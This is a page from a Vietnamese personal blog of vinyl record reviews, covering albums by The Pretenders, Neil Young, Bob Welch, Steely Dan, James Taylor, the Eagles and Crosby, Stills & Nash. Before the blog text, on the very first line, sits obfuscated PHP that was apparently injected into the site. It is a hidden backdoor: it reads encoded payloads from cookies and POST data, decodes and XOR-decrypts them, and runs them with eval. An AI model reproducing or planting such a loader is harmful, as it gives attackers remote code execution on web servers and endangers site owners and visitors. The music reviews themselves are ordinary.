$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> Vinyl – Page 5 – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Category: Vinyl (page 5 of 7)

The Pretenders – Pretenders

Pretenders là debut album của The Pretenders – một ban nhạc rock Anh/ Mỹ. Pretenders được xem như là một trong những debut album thành công nhất trong lịch sử. Nó được đón nhận và yêu thích ngay khi vừa mới ra đời, điều mơ ước của biết bao nhiêu ban nhạc.

Ra mắt vào đầu năm 1980, Pretenders là một trong những tên tuổi có ảnh hưởng mạnh trong làn sóng xâm-lược của dòng nhạc Anh quốc, lần này là sự kết hợp giữa punk và new wave. Vì vậy, Pretenders không dễ nghe chút nào. Không liên quan lắm, nhưng lần đầu nghe Pretenders mình có cảm giác trở lại là cậu bé 13 tuổi năm nào khi lần đầu được nghe thứ âm-nhạc-lạ-lùng của Megadeth (Peace Sells, Symphony of Destruction…) – những pha guitar chắc gọn, ca sĩ gằn giọng đọc nhiều hơn hát. Dĩ nhiên, The Pretenders chơi thứ nhạc không thô gằn và gãy gọn như Megadeth, giọng của Chrissie Hynde cũng dễ nghe hơn nhiều so với Dave Mustaine. Nói đúng hơn, với sự pha trộn thêm chút pop, album Pretenders dễ nghe vào hơn. Có cảm giác, Pretenders có vẻ chịu một phần ảnh hưởng của Kinks và The Who – những ban Anh quốc trong làn sóng xâm-lược lần đầu.

Ca sĩ chính đồng thời là thủ lĩnh của ban nhạc là phụ nữ, vì vậy ngoài cái tempo nhạc dồn dập đặc trưng của punk, Pretenders còn có điểm thêm những nét dịu dàng và ngọt ngào rất nhẹ. Ca khúc nổi nhất trong album chắc hẳn phải là Brass in Pocket. Nhiều người đánh giá đó là ca khúc hay nhất trong album, và thậm chí là hay nhất trong sự nghiệp của The Pretenders. Riêng mình, trong album này, mình thích bản cover Stop Your Sobbing mà họ cover của Kinks hơn.

Nhìn chung thì album này rất được, nó nhanh và dồn dập với những ca khúc như Tattooed Love Boys, Up the Neck nhưng cũng có những giai điệu ngọt ngào như trong Kid hay Don’t Get Me Wrong. Hơi khó nghe nếu bạn không phải là fan của thể loại nhạc punk/ new wave, nhưng nếu là fan của thể loại này rồi thì it’s worth a try.

‘Cause I gonna make you see
There’s nobody else here
No one like me

Neil Young – Harvest

Harvest là một trong những record đầu tiên mình có, đồng thời cũng là điểm đầu tiên thôi thúc cái thú vui sưu tập vinyl trong mình. Mình từng viết về Harvest của Neil Young như sau

Rồi có lần như tuần rồi, tôi đi estate sale nhà một ông giáo dạy nhạc vừa qua đời. Trong lúc người ta đang hối hả ngược xuôi ở tầng dưới, trả giá từng cái chén, cái ly trong bộ sưu tập của ông, thì mình tôi ngồi im ắng ở phòng trên lầu, nhìn vào dàn máy nhạc và đống đĩa vinyl của ông mà không mấy ai quan tâm. Trong turntable, vẫn đang để Harvest của Neil Young. Tôi đưa mắt nhìn vào góc phòng, nơi đó nằm lạc lõng cái ghế gỗ dựa bập bênh được. Tôi tự hỏi, phải chăng đây là nơi ông giáo mỗi tối ngồi đắm chìm trong âm nhạc – thứ đã đi cùng ông gần suốt cả cuộc đời. Cái lúc nghe tới ‘Old Man’, ông có buồn, có nghĩ đến điều gì không?

Và đến bây giờ, cảm giác mỗi lần nghe từng lời ca buồn đến não ruột trong Old Man vẫn còn nguyên như ban đầu. Ôi cái sự đồng cảm tuyệt diệu đấy.

—–

Harvest là album không được giới chuyên môn đánh giá cao nhưng rất thành công về doanh thu và nhất là trong lòng người hâm mộ của Neil Young. Trong album này, Young đã ưu ái mời dàn nhạc giao hưởng chơi cùng mình trong 2 bài. Những bài còn lại thì có đến 3 bài backup vocals là những người bạn cũ của ông trong Crosby, Stills & Nash (dĩ nhiên, có thể đoán, nghe rất ra mùi country folk rock – thứ nhạc mà CSN vốn được biết đến), 2 bài thành công nhất trong album là Old ManHeart of Gold thì backup vocals là James Taylor và Linda Ronstadt. Vì vậy, album này về chất lượng nghệ thuật mình thấy rất ổn, nó nghiêng về country nhiều nên giai điệu nhẹ nhàng và dễ nghe.

Nói về Old Man đi. Khó mà tin khi sáng tác bài này, Young mới 26 tuổi. Bài hát già dặn và buồn lõi đời hơn nhiều so với cái tuổi này của Young. Khi nghe bài hát, có cảm giác đó là một tay cao bồi già miền Nam, một chiều ngồi nhìn hoàng hôn, đốt thuốc và kể chuyện đời mình; hơn là một anh chàng lãng tử tóc dài quá vai, ôm cây guitar và cất giọng khàn khàn luyến láy.

Old man take a look at my life
I’m a lot like you
I need someone to love me
the whole day through

Harvest là album khá lạ kì. Nó thuộc dạng love or hate it, there is no between. Có rất nhiều người đánh giá thấp album này, vì nó không thể bằng được After the Gold Rush phát hành trước đó; hay nó quá cheesy, quá dễ nghe, hay là nó rời rạc quá, khi thì có những ca khúc gắng-làm-cho-trang-trọng đánh chung với dàn giao hưởng, chen lẫn những ca khúc dễ nghe, những ca khúc buồn man mác và cả sầu bi đau đớn… Lại có những người xem Harvest là một trong những album sáng giá nhất những năm 70. Không bàn đến Heart of Gold và Old Man, A Man Needs A Maid nghe rất hút hồn, ngay từ những nốt nhạc đầu tiên, Alabama gợi phần nào đến Lynyrd Skynyrd. Đặc biệt nhiều người đánh giá cao The Needle And The Damage Done nghe buồn như một bài nhạc blue vang lên trong chiều vắng. Mình thuộc trường hợp sau.

Đến hiện tại, Harvest vẫn là album mình nghe thường xuyên, có lẽ vì nó đóng vai trò quan trọng trong quá trình chơi vinyl của mình.

Bob Welch – French Kiss

Bob Welch chắc là tên tuổi bị ‘lãng quên’ đáng tiếc nhất trong ban nhạc Fleetwood Mac vang bóng một thời. Khi Fleetwood Mac cùng các thành viên sáng lập và ba thành viên khác được vinh danh vào Rock and Roll Hall of Fame, người ta bỏ quên tên của Bob. Giai đoạn có Bob trong band không phải giai đoạn hoàng kim của band, đúng ra đó chỉ là giai đoạn chuyển tiếp. Sau khi Bob rời khỏi, Fleetwood mới trở mình và vươn lên trở thành một trong những ban nhạc rock nổi tiếng nhất trên toàn thế giới. Tuy nhiên, vai trò ‘chuyển tiếp’ này của Bob khá quan trọng, như trong cuốn sách tiểu sử của Mick Fleetwood sau này, ông ta đã gọi Bob là ‘người đã cứu sống toàn bộ Fleetwood Mac’.

Mà thôi, hãy không nói về Fleetwood Mac, mà hãy nói tới Bob cùng album solo đầu tay French Kiss của ông.

French Kiss mở màn với hit được biết đến rộng rãi nhất của Bob – Sentimental Lady (mà Fleetwood Mac đã đưa vào album Bare Trees vài năm trước đó). Với sự giúp đỡ sản xuất của Lindsey Buckingham, Sentimental Lady đã mở màn như một quả tên lửa cực mạnh đẩy cả French Kiss lên vùn vụt, cả về thứ tự trong các bảng xếp hạng lẫn doanh thu trên toàn cầu. Nghe French Kiss phải gắng bỏ cái tên Fleetwood Mac ra khỏi đầu, vì đơn giản nó là một ban nhạc được tạo thành bởi những cái tên đầy tài năng. Bob khi còn trong band dĩ nhiên khi nghe sẽ có-cảm-giác hay hơn khi Bob ra solo. Đúng vậy, giọng của Bob không khoẻ, giọng ông hơi nhẹ, trong nhiều ca khúc nhanh và dồn dập có cảm giác đuối hẳn đi. Tuy giọng này khá hợp với Sentimental Lady, nhưng ở những ca khúc sau mình thấy hơi tụt.

Nói chung cảm nhận về cả một album mà chỉ nói đến ca khúc đầu tiên thôi thì hơi kì, nhưng đúng là các ca khúc còn lại khó có thể sánh bằng. Kể cả 2 single lọt vào top bảng xếp hạng của Bob là: Ebony EyesHot Love, Cold World. Dù Ebony Eyes có những câu guitar khá đẹp, hay lời của Hot Love, Cold World thì ổn đấy, nhưng nhìn chung vẫn chỉ là ở trên mức trung bình. Thậm chí, Hot Love, Cold World có một đoạn ngưng (break) tụt hết cả cảm xúc. Những ca khúc còn lại thì chỉ còn Lose Your Heart nghe được, vì nó chậm nên giọng của Bob nổi lên hơn.

Nhìn chung, mình khá thất vọng về album này, thỉnh thoảng nghe chơi qua thì được, nhưng mình không thật sự đánh giá cao lắm. Nếu phải cho điểm, mình sẽ cho 3.5/5

Steely Dan – Aja

Aja là một album khá lạ, theo ý mình. Nó được rất nhiều những dân nghe nhạc chuyên nghiệp hay những tay phối khí, những nghệ sĩ lớn xem là một trong, nếu không muốn nói, album hay nhất từng được thu âm. Aja của Steely Dan được thu âm đã gần 40 năm nhưng chất lượng của nó tuyệt vời đến mức cho đến giờ cũng hiếm record nào đạt tới được. Âm thanh nó hay tuyệt diệu và rất chuẩn. Nếu được hỏi record nào nên dùng để test xem một hệ thống chơi vinyl có ngon lành không, người ta đa phần hay khuyên: hãy bỏ Aja vào. Thế nhưng, với đông đảo thính giả nghe nhạc, Aja không phải là một cái tên thuộc dạng khá phổ thông, đại chúng.

Vào cái mùa hè Summer of Hate năm 1977 nổi tiếng đó, không phải God Save The Queen của Sex Pistols, cũng không phải The Clash với album cùng tên của mình là điểm nóng nhất, mà là Aja của Steely Dan – một album hoàn toàn không dính gì tới phong trào punk đầy nổi loạn và gây tranh cãi kéo dài. Phải chăng vì thế mà sau này, Rolling Stones đã gọi họ là “kẻ phản-diện hoàn hảo nhất trong âm nhạc những năm 70”.

Aja thuộc thể loại jazz rock. Và đây cũng là record đầu tiên mình nghe kết hợp jazz vào với rock. Trong album này, Donald Fagen và Walter Becker mời cộng tác những tên tuổi thuộc loại nổi tiếng nhất trong loại nhạc jazz/R&B những năm 70: tay trống Steve Gadd (một trong những tay trống được đánh giá cao nhất về chuyên môn) và Bernard Perdie (Purdie Shuffle nổi tiếng), tay bass Chuck Rainey, vocal Michael McDonald (của The Doobie Brothers), đặc biệt là tay saxophone huyền thoại, người sau này thắng tới 10 giải Grammy là Wayne Shorter. Với “đội hình” đẹp như thế, không khó hiểu khi trong album có những đoạn solo ngẫu hứng đẹp đến rụng rời.

Nhìn chung, Aja theo mình thấy xứng với những gì mà những nhà phê bình, dù là khó tính nhất khen ngợi. Cái thể loại jazz-rock đầy ngẫu hứng đi kèm lyrics cũng tự nhiên và lạ không kém khiến mình thổn thức không thôi. Đây là một trong những record hiếm hoi mà mới nghe lần đầu mình đã hứng thú đến mức chơi đi chơi lại liên tục. Track mình thích nhất trong album chắc là Aja, nhất là đoạn thổi saxophone lả lơi mà dịu dàng đầm ấm, nghe vào cứ như thấy mình đang bay bổng, phiêu du.

Highly recommended!

James Taylor – Mud Slide Slim And The Blue Horizon & Greatest Hits

2 records mình có của James Taylor, tìm được khi đang phủ bụi trên kệ đĩa ở tiệm sách cũ: Mud Slide Slim & The Blue Horizon, và Greatest Hits. Vẫn như trước, mình sẽ không nói nhiều đến Greatest Hits vốn là album tổng hợp của James.

Những review về James rất trái chiều. Có nhiều nhà phê bình đánh giá ông là một tài năng hiếm hoi, như Chuck Berry, Bob Dylan hay The Band những năm thập niên 60, 70. Ông kết hợp được thứ âm nhạc blue buồn man mác của người da đen vào với thứ folk rock rộn ràng vui nhộn của những người da trắng. Thính giả vốn đặt rất nhiều kì vọng vào ông sau album Sweet Baby James phát hành ngay năm trước đó, đã phần nào thất vọng với Mud Slide Slim & The Blue Horizon. Ngay từ bìa album. Chỉ một năm cách biệt, James trên cover của album mới nhìn đầy phong trần và buồn nản hơn, so với hình ảnh một James nghiêm nghị mím môi nhưng nhìn trẻ trung và đầy sức sống ở album trước đó. Âm nhạc của James trong album mới cũng buồn và mất tinh thần hơn nhiều, có lẽ ảnh hưởng bởi tác dụng phụ của rượu và chất kích thích mà ông dùng liên tục trong khoảng thời gian đó. Ẩn chứa trong vài bài của James còn có tư tưởng buông xuôi, chán đời.

Nếu không đọc hay không biết, không quan tâm về cuộc đời James thì ắt thấy album này  hay. Âm nhạc vẫn là sự tiếp nối từ album trước. Giọng của James vẫn rất đặc biệt, cái chất giọng cao và cô độc đầy cảm xúc đấy vẫn cuốn hút như ngày nào. Và có lẽ, đó cũng là đánh giá của mình cho album thứ 3 ngày của James. Về nghệ thuật, hay đủ để tán dương, đặc biệt là track cover của Carole King You’ve Got A Friend, có lẽ không ai hát được bản này đầy xúc cảm đến thế. Nội chỉ một track này thôi, cũng đủ bừng sáng cả một album…

I don’t know no love songs and I can’t sing the blues anymore.
But I can sing this song and you can sing this song when I’m gone.

Eagles – On The Border & Their Greatest Hits 1971-1975

Trước khi thấy hai record này ở một tiệm đĩa với giá rẻ mạt thì điều duy nhất mình biết đến ở Ealges là Hotel California; không hơn, không kém. Mình tìm thông tin trên Google nhanh thì thấy On The Border là album nằm ở khoảng giữa giữa của Eagles. Không quá non nớt như những album đầu, nhưng chưa đạt tới đỉnh cao của nghệ thuật như với Hotel California. Nó là một Eagles vẫn chỉ đang dần định hình được chính mình và dòng nhạc của mình theo đuổi.

Không nói kĩ về Their Greatest Hits 1971 – 1975 vì nó là đĩa tổng hợp, mình ít nói về đĩa tổng hợp, ngoài trường hợp như đây, nhân tiện viết thì liệt kê vào. On The Border đánh dấu một Eagles đang gắng xoá cái định kiến một ban-nhạc-country-rock. Thứ họ muốn chơi là thứ nhạc đang lên ngôi của những năm thập niên 70: hard rock và rock n roll. Trong khi thu âm On The Border, Eagles quyết định cắt đứt hợp đồng với nhà sản xuất Glyn Johns (khi chỉ mới xong có 2 ca khúc là: You Never Cry Like a LoverBest of My Love) vì Johns có khuynh hướng nghiêng quá nhiều về country rock. Sau đó Eagles tìm được Bill Szymczy. Szymczy thích thứ nhạc đầy thô ráp và nhiều đoạn guitar điện – vốn đúng thứ mà Eagles nhắm tới hơn.

Cũng cùng lúc đó, Bernie tìm đến người bạn cũ Don Felder của mình và đề nghị Felder giúp chơi vài track trong album mới. Sự hợp tác này tốt đẹp đến mức, tuy chỉ góp mặt trong 2 track là Already GoneGood Day in Hell, Felder đã hoàn toàn thuyết phục được các thành viên Eagles bằng tiếng guitar điêu luyện của mình, để rồi trở thành lead guitar của Eagles cho đến mấy chục năm sau.

On The Border đạt được thành công tàm tạm ở cả Anh và Mỹ, leo lên vị trí khá đẹp trên các bảng xếp hạng (lần lượt là #28 và #17). Điều hài hước nhất là một trong 2 ca khúc của Johns trong album này: Best of My Love lại là single chiếm vị trí đầu bảng, trong khi track được chờ đợi là Already Gone chỉ tới vị trí #32.

Tuy nhiên, hạng không hẳn đã là yếu tố quan trọng. Cá nhân mình nghĩ đây là bước đi đúng hướng của Eagles. Sự bổ sung vào đội hình một tay guitar tài ba khác (nâng tổng số tay chơi guitar trong band lên tới 3) khiến cho các bài hát của Eagles đầy giai điệu hơn. Có thể có những track trong album phần guitar vẫn có cảm giác dài lê thê và mất kết nối, nhưng thính giả khi nghe album này hoàn toàn có thể trông chờ vào một Eagles ở các album kế tiếp – khi những nhạc công của họ đã hoà cùng một nhịp.

On The Border không hẳn là một record hay tuyệt, nhưng là record xứng có trong bộ sưu tập.

Crosby, Stills & Nash – CSN

CSN là album thứ 3 của Crosby, Stills & Nash, ra sau Déjà Vu nổi tiếng mà mình đã nhắc ở đây. Sau Déjà Vu (1970), các thành viên trong ban nhạc bận rộn theo đuổi những dự án riêng của mình. Lần duy nhất trong 7 năm đó mà họ tái hợp với đầy đủ đội hình (có cả Neil Young) là vào tour năm 1974. Những người yêu nhạc đã chờ quá lâu mới lại được nghe Crosby, Stills & Nash hát. Vì vậy, không lấy gì làm ngạc nhiên khi CSN leo hạng vùn vụt trên các bảng xếp hạng ngay khi vừa ra mắt. Vấn đề là, CSN có thật sự hay, hoặc đó chỉ là sự mong chờ của thính giả quyết định?

Câu trả lời là 3/4 và 1/4. Hơi lạ, nhưng là vậy. Nghĩa là CSN có hay, vẫn hay, đủ hay hơn hầu hết các folk rock và soft rock band và album cùng giai đoạn. Đem so với Déjà Vu trước đó 7 năm thì hơi bất công quá cho CSN, khi album này không còn Young, nhưng nếu chỉ đem so với album đầu tay (cùng tên) của Crosby, Stills & Nash, thì CSN vẫn có chút gì đó kém.

Nói là kém, ấy là khi đặt tiêu chuẩn so sánh cao quá thôi, chứ như đã nói, CSN vẫn hay, vì nó vẫn giữ được chất nhạc mà CSN theo đuổi từ đầu: những bài hát cực giàu giai điệu, lời nhạc thơ và ý nghĩa, phối khí các giọng ca hát nối ngay hay chồng lên nhau tạo hiệu ứng thính giác đặc biệt, nghe tựa như một dàn đồng ca nhỏ đang xướng vang. Thêm nữa, không hẳn là CSN không có điểm đặc sắc của riêng mình. Nó có, nhưng khó nhận ra. Đó là khả năng sáng tác của 3 thành viên đã chín muồi hơn, đặc biệt là ở Stills – các bài hát buồn với tâm trạng u ám sau cuộc hôn nhân tan vỡ.

Nhìn chung, mình không thích CSN bằng album Déjà Vu trước đó, nhưng vẫn đánh giá đây là một album nghe được.

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.